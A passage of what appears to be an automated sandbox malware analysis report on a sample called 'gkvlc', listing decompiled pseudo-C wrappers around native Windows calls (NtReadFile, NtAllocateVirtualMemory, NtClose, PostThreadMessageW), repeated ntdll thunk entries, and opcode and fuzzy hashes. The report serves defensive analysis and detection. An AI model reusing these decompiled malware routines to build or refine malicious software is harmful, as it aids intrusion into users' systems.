                                                                                            • NtReadFile.NTDLL(00419573,00414A3F,FFFFFFFF,00419063,00000002,?,00419573,00000002,00419063,FFFFFFFF,00414A3F,00419573,00000002,00000000), ref: 0041E728
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.306509609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_gkvlc.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: FileRead
                                                                                            • String ID:
                                                                                            • API String ID: 2738559852-0
                                                                                            • Opcode ID: 91eb1fe7e6b0bb41bcf43feb8d5f3ed49b4c579715ab90baf32fd4663cdbdfde
                                                                                            • Instruction ID: c7fdf6d28ccd7a51df5f0a75737fdcd3e006e27bf8712970d3af506a93e8e7e5
                                                                                            • Opcode Fuzzy Hash: 91eb1fe7e6b0bb41bcf43feb8d5f3ed49b4c579715ab90baf32fd4663cdbdfde
                                                                                            • Instruction Fuzzy Hash: 57F0F4B2214208ABCB14DF89DC84EEB77ADEF8C714F118248BA0D97241C630E811CBA0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0041E6E3 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 242 41e6e3-41e6f9 243 41e6ff-41e72c NtReadFile 242->243 244 41e6fa call 41f2a3 242->244 244->243
                                                                                            C-Code - Quality: 37%
                                                                                            			E0041E6E3(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				intOrPtr* _t27;

				_t3 = _a4 + 0xa74; // 0xa76
				_t27 = _t3;
				E0041F2A3( *((intOrPtr*)(_a4 + 0x14)), _t13, _t27,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x2a);
				_t18 =  *((intOrPtr*)( *_t27))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40); // executed
				return _t18;
			}





                                                                                            0x0041e6f2
                                                                                            0x0041e6f2
                                                                                            0x0041e6fa
                                                                                            0x0041e728
                                                                                            0x0041e72c

                                                                                            APIs
                                                                                            • NtReadFile.NTDLL(00419573,00414A3F,FFFFFFFF,00419063,00000002,?,00419573,00000002,00419063,FFFFFFFF,00414A3F,00419573,00000002,00000000), ref: 0041E728
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.306509609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_gkvlc.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: FileRead
                                                                                            • String ID:
                                                                                            • API String ID: 2738559852-0
                                                                                            • Opcode ID: 844797972357584b4267d2b4ccdf650626f96eee6e100a2b7eb001bcc7868e0e
                                                                                            • Instruction ID: 8ee6a1e2a529e3e885e860ed82adb7cec70c5e741b9a12bc87503b01404fbc4f
                                                                                            • Opcode Fuzzy Hash: 844797972357584b4267d2b4ccdf650626f96eee6e100a2b7eb001bcc7868e0e
                                                                                            • Instruction Fuzzy Hash: 60F0FFB2200208ABCB04DF89DC84EEB77ADAF8C714F018248BA0DA7241C630E8118BA0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0041E813 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 245 41e813-41e850 call 41f2a3 NtAllocateVirtualMemory
                                                                                            C-Code - Quality: 100%
                                                                                            			E0041E813(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;

				_t10 = _a4;
				_t2 = _t10 + 0x14; // 0x6ad04d03
				_t3 = _t10 + 0xa8c; // 0x4040a3
				E0041F2A3( *_t2, _a4, _t3,  *_t2, 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}




                                                                                            0x0041e816
                                                                                            0x0041e819
                                                                                            0x0041e822
                                                                                            0x0041e82a
                                                                                            0x0041e84c
                                                                                            0x0041e850

                                                                                            APIs
                                                                                            • NtAllocateVirtualMemory.NTDLL(00010000,?,00000000,00403617,00000004,00001000,00000000), ref: 0041E84C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.306509609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_gkvlc.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AllocateMemoryVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 2167126740-0
                                                                                            • Opcode ID: 007d9bb2bc6f869d9d5f2aff9c303a90246c852ee550cafd5b2adb6fd69cc88f
                                                                                            • Instruction ID: 26a1e93956d18407f6a645e9906c8f1fb55fe7f601173720372596f8a04fa613
                                                                                            • Opcode Fuzzy Hash: 007d9bb2bc6f869d9d5f2aff9c303a90246c852ee550cafd5b2adb6fd69cc88f
                                                                                            • Instruction Fuzzy Hash: 09F01EB6210208ABCB18DF89DC81EEB77ADAF88754F018159BE0897241C630F811CBB4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0041E763 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E0041E763(intOrPtr _a4, void* _a8) {
				long _t8;

				E0041F2A3( *((intOrPtr*)(_a4 + 0x14)), _a4, _t5 + 0xa7c,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}




                                                                                            0x0041e77a
                                                                                            0x0041e788
                                                                                            0x0041e78c

                                                                                            APIs
                                                                                            • NtClose.NTDLL(00410398,00000000,?,00410398,?,?,?,?,?,?,?,00000000,?,00000000), ref: 0041E788
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.306509609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_gkvlc.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Close
                                                                                            • String ID:
                                                                                            • API String ID: 3535843008-0
                                                                                            • Opcode ID: 675b6986af3fbe89ca5381cf45abfbeb38fb14a73c53f9364842799534e556c6
                                                                                            • Instruction ID: fa57c1bbd6e363d6a5e3fac0cac4812f29e20349ee557f5836c54a383bd1885a
                                                                                            • Opcode Fuzzy Hash: 675b6986af3fbe89ca5381cf45abfbeb38fb14a73c53f9364842799534e556c6
                                                                                            • Instruction Fuzzy Hash: 31D01776604214ABD610EBA9DC89FD77BACDF88664F0184A9BA1C5B642C571FA0086E1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00AB98F0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.307286924.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_a50000_gkvlc.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 55af104e65493959a3b045fc209df0a4fc67bea0fd4d261e75c82f7522778e97
                                                                                            • Instruction ID: ca347d956d130fc28e9bf3ecbfcfc175f6ca726f6af44adc79914e3c3c1641a5
                                                                                            • Opcode Fuzzy Hash: 55af104e65493959a3b045fc209df0a4fc67bea0fd4d261e75c82f7522778e97
                                                                                            • Instruction Fuzzy Hash: 3290026160500502D30171694404B16000A97D0381F92C036A1114595ECA658992F171
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00AB9860 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.307286924.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_a50000_gkvlc.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 7eabb48c259bb7b693792b69cfcdbbaf4cc8ebc98c062eef8b1e13ddbf4ad1df
                                                                                            • Instruction ID: 47e3c99fb5e71eb188e40da21ff5119dcd9d9a48cd65bc5c51f461d00f38e03c
                                                                                            • Opcode Fuzzy Hash: 7eabb48c259bb7b693792b69cfcdbbaf4cc8ebc98c062eef8b1e13ddbf4ad1df
                                                                                            • Instruction Fuzzy Hash: 9B90027120500413D31161694504B07000997D0381F92C436A0514598D96968952F161
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00AB9840 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.307286924.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_a50000_gkvlc.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 1df5af19f398aa5e1449371e36dfa91e6ac0e31a47086ca7718e99c651ee7b47
                                                                                            • Instruction ID: 3d3d17baa0602041cc143a76009b3f3fa99b49e95e50b47cc2ee624adef075e7
                                                                                            • Opcode Fuzzy Hash: 1df5af19f398aa5e1449371e36dfa91e6ac0e31a47086ca7718e99c651ee7b47
                                                                                            • Instruction Fuzzy Hash: 10900261246041525745B1694404A074006A7E0381792C036A1504990C85669856E661
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00AB99A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.307286924.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_a50000_gkvlc.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 5f02b987e84a2bf44f29fb82309372205d625bac10cc0758a179ea3cefaa8914
                                                                                            • Instruction ID: c026f655fec7fa114ab613049bd28a9a4c0a60f4a22d9b6420e8ea7a610899b8
                                                                                            • Opcode Fuzzy Hash: 5f02b987e84a2bf44f29fb82309372205d625bac10cc0758a179ea3cefaa8914
                                                                                            • Instruction Fuzzy Hash: 3C9002A134500442D30061694414F060005D7E1341F52C039E1154594D8659CC52B166
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00AB95D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.307286924.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_a50000_gkvlc.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 797798abf11402d3515bbf2e2054553b757dc12ab012c32876eb4273776634f0
                                                                                            • Instruction ID: 6381622d47ce0e66eb2de472c1f860bcdd3cab034cd1b972542807a7c8a8d7b0
                                                                                            • Opcode Fuzzy Hash: 797798abf11402d3515bbf2e2054553b757dc12ab012c32876eb4273776634f0
                                                                                            • Instruction Fuzzy Hash: F39002A120600003430571694414B16400A97E0341B52C035E11045D0DC5658891B165
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00AB9910 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.307286924.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_a50000_gkvlc.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: d177ac9f029d5cbe6d9ab378e25ccc84729e077cda3ce39aca23f9526e6c152b
                                                                                            • Instruction ID: 51b2ab36ccd8a3418056d602dac2de474d8b3dd97001d7f37f8fc799697b06e9
                                                                                            • Opcode Fuzzy Hash: d177ac9f029d5cbe6d9ab378e25ccc84729e077cda3ce39aca23f9526e6c152b
                                                                                            • Instruction Fuzzy Hash: 139002B120500402D34071694404B46000597D0341F52C035A5154594E86998DD5B6A5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00AB9540 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.307286924.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_a50000_gkvlc.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 2c685e1bf2ffcbef8aeaf0caa9d5810a29604edb2db45c430f1a2c5df5253f61
                                                                                            • Instruction ID: b8fd0063769497a3c4a5a0bd6fe35cb974202eb275c34afae74f1d5b9240f4ad
                                                                                            • Opcode Fuzzy Hash: 2c685e1bf2ffcbef8aeaf0caa9d5810a29604edb2db45c430f1a2c5df5253f61
                                                                                            • Instruction Fuzzy Hash: 37900265215000030305A5690704A07004697D5391352C035F1105590CD6618861A161
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00AB96E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.307286924.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_a50000_gkvlc.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 517d64f09a84495556f18a2c36617c4eebc6565cc665ab382a9f3fe36f1f8912
                                                                                            • Instruction ID: 1be88d5a2eb8e1157703dafa4542dbe18b3bff5bb0e0eea057e283ca6be5da01
                                                                                            • Opcode Fuzzy Hash: 517d64f09a84495556f18a2c36617c4eebc6565cc665ab382a9f3fe36f1f8912
                                                                                            • Instruction Fuzzy Hash: 9A90027120508802D31061698404B4A000597D0341F56C435A4514698D86D58891B161
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00AB9A20 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.307286924.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_a50000_gkvlc.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 6ef5b5a9c25c2270d0afa3a0f40a788ca74ae82ef3af4d381feba62222488011
                                                                                            • Instruction ID: 01bdc4a1eab63954c2403bd72f59dccc8c5e2dd31fc2bd06c26da9b2c7d2dd71
                                                                                            • Opcode Fuzzy Hash: 6ef5b5a9c25c2270d0afa3a0f40a788ca74ae82ef3af4d381feba62222488011
                                                                                            • Instruction Fuzzy Hash: 1A90026160500042434071798844E064005BBE1351752C135A0A88590D85998865A6A5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00AB9A00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.307286924.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_a50000_gkvlc.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 424a4366bc60731b194a54b1a0206c8e6790e0376b178187627ebd0c0579b9b7
                                                                                            • Instruction ID: fbad0c2c4dcec2923ebb553f7525d3212f8f99b3f91adfd1834d07fcbcd40fbf
                                                                                            • Opcode Fuzzy Hash: 424a4366bc60731b194a54b1a0206c8e6790e0376b178187627ebd0c0579b9b7
                                                                                            • Instruction Fuzzy Hash: AB90027120540402D30061694814B0B000597D0342F52C035A1254595D86658851B5B1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00AB9660 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.307286924.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_a50000_gkvlc.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: e2ad52f04dcbd3adec45e5557663e323cdc2a281221a9cebe1a983fd8a6a78e4
                                                                                            • Instruction ID: 2100620bea3a32f8e19b9d102ffd03e8059d5de84ad96fdeb43e22a3d7cdc196
                                                                                            • Opcode Fuzzy Hash: e2ad52f04dcbd3adec45e5557663e323cdc2a281221a9cebe1a983fd8a6a78e4
                                                                                            • Instruction Fuzzy Hash: 1B90027120500802D38071694404B4A000597D1341F92C039A0115694DCA558A59B7E1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00AB9A50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.307286924.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_a50000_gkvlc.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 69251470b054167587144225613d435ddac39fb37cedd54a47e8a637dfcb2ca8
                                                                                            • Instruction ID: ae7da978a7e5cde2a2f0c6cb20f3141907a17bba57da171a0684a8b24ad60794
                                                                                            • Opcode Fuzzy Hash: 69251470b054167587144225613d435ddac39fb37cedd54a47e8a637dfcb2ca8
                                                                                            • Instruction Fuzzy Hash: D790026121580042D30065794C14F07000597D0343F52C139A0244594CC9558861A561
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00AB97A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.307286924.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_a50000_gkvlc.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 3a9afe3398ff3f7ae5f3414cc529eb05932eeebb581f26b5e19c55083342f285
                                                                                            • Instruction ID: 1ceede0a7cb670c4d60282d1e800704b6b0748993a5cb60170de2753694ab54e
                                                                                            • Opcode Fuzzy Hash: 3a9afe3398ff3f7ae5f3414cc529eb05932eeebb581f26b5e19c55083342f285
                                                                                            • Instruction Fuzzy Hash: DC90026130500003D34071695418B064005E7E1341F52D035E0504594CD9558856A262
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00AB9780 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.307286924.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_a50000_gkvlc.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 685c5ce58910f45f5f8e916c1c367af7efa0d2c4020190b4dcefcb5254ece0fa
                                                                                            • Instruction ID: 6ab0d2ee7abec32692453d5130e9f00ba43068ef8c65de180ea78c516198fc8e
                                                                                            • Opcode Fuzzy Hash: 685c5ce58910f45f5f8e916c1c367af7efa0d2c4020190b4dcefcb5254ece0fa
                                                                                            • Instruction Fuzzy Hash: 8290026921700002D38071695408B0A000597D1342F92D439A0105598CC9558869A361
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00AB9FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.307286924.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_a50000_gkvlc.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 9fc8663e18b459676708d7c861d57229102882c7bc1d90b4b1587300a555a7b2
                                                                                            • Instruction ID: 13b9e750c891e9de3df035afe71697c3ad864ce51e480c7cae803506e194450d
                                                                                            • Opcode Fuzzy Hash: 9fc8663e18b459676708d7c861d57229102882c7bc1d90b4b1587300a555a7b2
                                                                                            • Instruction Fuzzy Hash: 7490027131514402D31061698404B06000597D1341F52C435A0914598D86D58891B162
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00AB9710 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.307286924.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_a50000_gkvlc.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 0cc879964c8d0a8f2b28df8f6bd27908440274e00633c100f94010c983c626a4
                                                                                            • Instruction ID: 4fc44ef761ff19529dbd619fe24a43887543a74015ed4c8e16905f9e288fe321
                                                                                            • Opcode Fuzzy Hash: 0cc879964c8d0a8f2b28df8f6bd27908440274e00633c100f94010c983c626a4
                                                                                            • Instruction Fuzzy Hash: 6990027120500402D30065A95408B46000597E0341F52D035A5114595EC6A58891B171
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0040992F Relevance: 1.6, APIs: 1, Instructions: 62threadwindowCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            C-Code - Quality: 84%
                                                                                            			E0040992F(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _v1957348112;
				void* _t14;
				int _t16;
				long _t30;
				int _t33;
				void* _t36;
				void* _t38;
				void* _t43;

				_t43 = __eflags;
				_t36 = _t38;
				_v68 = 0;
				E00420273( &_v67, 0, 0x3f);
				E00420D23( &_v68, 3);
				_t20 = _a4;
				_t14 = E0040CFB3(_t43, _a4 + 0x20,  &_v68); // executed
				_t16 = E00419653(_a4 + 0x20, _t14, 0, 0, E00402EB3(0x79fedeee));
				_t33 = _t16;
				if(_t33 != 0) {
					_t30 = _a8;
					_t16 = PostThreadMessageW(_t30, 0x111, 0, 0); // executed
					if(_t16 == 0) {
						_t16 =  *_t33(_t30, 0x8003, _t36 + (E0040C683(1, 8, _t20 + 0x70) & 0x000000ff) - 0x40, _t16);
					}
				}
				return _t16;
			}













                                                                                            0x0040992f
                                                                                            0x00409934
                                                                                            0x00409944
                                                                                            0x00409948
                                                                                            0x00409953
                                                                                            0x00409958
                                                                                            0x00409963
                                                                                            0x0040997b
                                                                                            0x00409980
                                                                                            0x00409987
                                                                                            0x00409989
                                                                                            0x00409996
                                                                                            0x0040999a
                                                                                            0x004099bb
                                                                                            0x004099bb
                                                                                            0x0040999a
                                                                                            0x004099c3

                                                                                            APIs
                                                                                            • PostThreadMessageW.USER32(00001D8B,00000111,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409996
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.306509609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_gkvlc.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: MessagePostThread
                                                                                            • String ID:
                                                                                            • API String ID: 1836367815-0
                                                                                            • Opcode ID: b1ed9b180059bae02879cd5599a119f501c892c3f78f6bac5e111076a9eae77b
                                                                                            • Instruction ID: c5a67edce04e928d79e50014f77dbdd7cea4bf40d7f72b8c9baf341f39555e96
                                                                                            • Opcode Fuzzy Hash: b1ed9b180059bae02879cd5599a119f501c892c3f78f6bac5e111076a9eae77b
                                                                                            • Instruction Fuzzy Hash: 9F01DB71A8021476EB2196A19C83FEF776C9B40B54F14016EFF04BA2C2D7E9690583F5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00409933 Relevance: 1.6, APIs: 1, Instructions: 62threadwindowCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 197 409933-409944 198 40994d-409987 call 420d23 call 40cfb3 call 402eb3 call 419653 197->198 199 409948 call 420273 197->199 208 409989-40999a PostThreadMessageW 198->208 209 4099bd-4099c3 198->209 199->198 208->209 210 40999c-4099ba call 40c683 208->210 210->209
                                                                                            C-Code - Quality: 84%
                                                                                            			E00409933(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t13;
				int _t15;
				long _t25;
				int _t27;
				void* _t28;
				void* _t32;

				_t32 = __eflags;
				_v68 = 0;
				E00420273( &_v67, 0, 0x3f);
				E00420D23( &_v68, 3);
				_t19 = _a4;
				_t13 = E0040CFB3(_t32, _a4 + 0x20,  &_v68); // executed
				_t15 = E00419653(_a4 + 0x20, _t13, 0, 0, E00402EB3(0x79fedeee));
				_t27 = _t15;
				if(_t27 != 0) {
					_t25 = _a8;
					_t15 = PostThreadMessageW(_t25, 0x111, 0, 0); // executed
					if(_t15 == 0) {
						return  *_t27(_t25, 0x8003, _t28 + (E0040C683(1, 8, _t19 + 0x70) & 0x000000ff) - 0x40, _t15);
					}
				}
				return _t15;
			}











                                                                                            0x00409933
                                                                                            0x00409944
                                                                                            0x00409948
                                                                                            0x00409953
                                                                                            0x00409958
                                                                                            0x00409963
                                                                                            0x0040997b
                                                                                            0x00409980
                                                                                            0x00409987
                                                                                            0x00409989
                                                                                            0x00409996
                                                                                            0x0040999a
                                                                                            0x00000000
                                                                                            0x004099bb
                                                                                            0x0040999a
                                                                                            0x004099c3

                                                                                            APIs
                                                                                            • PostThreadMessageW.USER32(00001D8B,00000111,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409996
                                                                                            Memory Dump Source
